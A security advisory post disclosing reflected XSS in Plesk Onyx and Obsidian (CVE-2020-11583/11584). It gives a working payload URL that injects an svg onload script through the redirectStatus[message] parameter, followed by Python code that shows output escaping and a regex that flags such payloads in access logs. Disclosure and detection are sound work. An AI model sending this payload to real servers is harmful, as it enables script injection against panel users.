XSS reflected in Plesk Onyx and Obsidian (CVE-2020-11583, CVE-2020-11584)

0x00Crashes
Aug 3, 2020


About Plesk

From plesk.com:

— — —

Plesk is the leading WebOps hosting platform to run, automate and grow applications, websites and hosting businesses. Being the only OS agnostic platform, Plesk is running on more than 384,000 servers, automating 11M+ websites and 19M+ mail boxes. Available in more than 32 languages across 140 countries, 50% of the top 100 service providers worldwide are partnering with Plesk today.

Plesk has simplified the life of SysAdmins and SMBs since the early 2000’s and continues to add value across multiple cloud services. The Plesk hosting platform effectively enables application developers by providing access to a simple and more secure web infrastructure managed by web pros and hosting companies.

— — —

Affected

  • Plesk Onyx 17.8.11 (Linux)
  • Plesk Obsidian 18.0.17 (Windows)

(Screenshots: Plesk Onyx 17.8.11 Linux info; Plesk Obsidian 18.0.17 Windows info)

Steps to reproduce

  1. Sign in
  2. Paste URL into browser: https://[__hostname__]:8443/smb/app?redirectStatus%5Bstatus%5D=error&redirectStatus%5Bmessage%5D=%22%3E%3Csvg/onload=confirm(document.domain)%3E
(Screenshots: XSS URL (Linux); XSS (Linux); XSS URL (Windows); XSS (Windows))
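The reproduction URL above reflects the `redirectStatus[message]` query value into the page without HTML encoding, which is what lets the `">` prefix close an attribute and the `<svg onload>` tag execute. The block below is an added example and not Plesk's code: it parses the PHP-style bracketed parameters from the advisory URL (hostname replaced with the placeholder `plesk.example`), contrasts a hypothetical unescaped status banner with an HTML-escaped one, and flags web-server access-log lines (constructed sample lines) whose decoded message carries markup or an event-handler attribute. The banner markup and the log format are assumptions for illustration.

```python
import re
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed: the advisory's reproduction URL with a placeholder hostname.
ADVISORY_URL = (
    "https://plesk.example:8443/smb/app?redirectStatus%5Bstatus%5D=error"
    "&redirectStatus%5Bmessage%5D=%22%3E%3Csvg/onload=confirm(document.domain)%3E"
)

# Markup tags or on*= event handlers inside a decoded parameter value.
SUSPICIOUS = re.compile(r"<\s*(?:svg|script|img|iframe)\b|\bon[a-z]+\s*=", re.I)

# Constructed Apache/nginx-style access-log lines (not from the advisory).
LOG_LINES = [
    '203.0.113.7 - - [03/Aug/2020:10:00:00 +0000] "GET /smb/app?redirectStatus%5Bstatus%5D=error'
    '&redirectStatus%5Bmessage%5D=%22%3E%3Csvg/onload=confirm(document.domain)%3E HTTP/1.1" 200 512',
    '203.0.113.8 - - [03/Aug/2020:10:00:01 +0000] "GET /smb/app?redirectStatus%5Bstatus%5D=info'
    '&redirectStatus%5Bmessage%5D=Saved HTTP/1.1" 200 512',
]


def parse_redirect_status(url_or_path):
    """Return the decoded redirectStatus[status] / redirectStatus[message] values.

    parse_qs percent-decodes %5B/%5D, so the keys become 'redirectStatus[status]'
    and 'redirectStatus[message]'; only the first '=' of each pair is a separator,
    so a message containing '=' survives intact.
    """
    qs = parse_qs(urlsplit(url_or_path).query, keep_blank_values=True)
    return {
        "status": qs.get("redirectStatus[status]", [""])[0],
        "message": qs.get("redirectStatus[message]", [""])[0],
    }


def render_banner_unescaped(status, message):
    """Hypothetical vulnerable rendering: the message is concatenated into HTML
    as-is, so a value starting with '">' leaves the attribute and injects a tag."""
    return f'<div class="status-{status}" data-msg="{message}">{message}</div>'


def render_banner_escaped(status, message):
    """Hardened rendering: the status token is restricted to a known set and the
    message is HTML-escaped (quote=True also encodes '"' and "'"), so it is safe
    both inside the attribute value and as text content."""
    if status not in {"error", "warning", "info", "success"}:
        status = "info"
    safe = escape(message, quote=True)
    return f'<div class="status-{status}" data-msg="{safe}">{safe}</div>'


def flag_xss_attempts(log_lines):
    """Return (client_ip, decoded_message) for each request whose
    redirectStatus[message] value contains markup or an event handler."""
    request_re = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')
    hits = []
    for line in log_lines:
        m = request_re.search(line)
        if not m:
            continue
        message = parse_redirect_status(m.group(2))["message"]
        if SUSPICIOUS.search(message):
            hits.append((m.group(1), message))
    return hits


if __name__ == "__main__":
    params = parse_redirect_status(ADVISORY_URL)
    print("unescaped:", render_banner_unescaped(**params))
    print("escaped:  ", render_banner_escaped(**params))
    print("flagged:  ", flag_xss_attempts(LOG_LINES))
```

The escaped banner renders the payload as literal text (`&quot;&gt;&lt;svg/...`), which is the fix class the vendor patch applies: context-appropriate output encoding of every reflected parameter, plus restricting `status` to known values. The log scan is a cheap way to confirm whether the reproduction URL was ever requested against an unpatched panel.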
